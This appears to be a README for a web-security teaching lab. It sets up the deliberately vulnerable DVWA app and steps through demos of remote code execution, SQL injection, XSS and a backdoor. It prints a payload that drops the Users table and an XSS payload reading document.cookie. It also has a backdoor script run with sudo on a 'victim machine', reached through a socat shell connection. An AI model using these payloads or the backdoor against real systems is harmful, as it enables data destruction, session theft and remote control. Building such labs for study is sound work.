virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt
docker run --rm -it -p 8081:80 vulnerables/web-dvwa
and create db in web interface of DVWA.python rce/run.sh
python sql-injection/run_vulnerable.py
and enter"""2'); drop table Users; --"""
php -S localhost:8024
/index.php?text=faketitle%20onmouseover=(function(){alert(document.cookie)})();
- Hover special text.
- For secure
/index_secure.php?text=faketitle%20onmouseover=(function(){alert(document.cookie)})();
sudo backdoor/backdoor.sh
on victim machinesocat STDIO TCP4:<victim ip>:1178
on attacker machine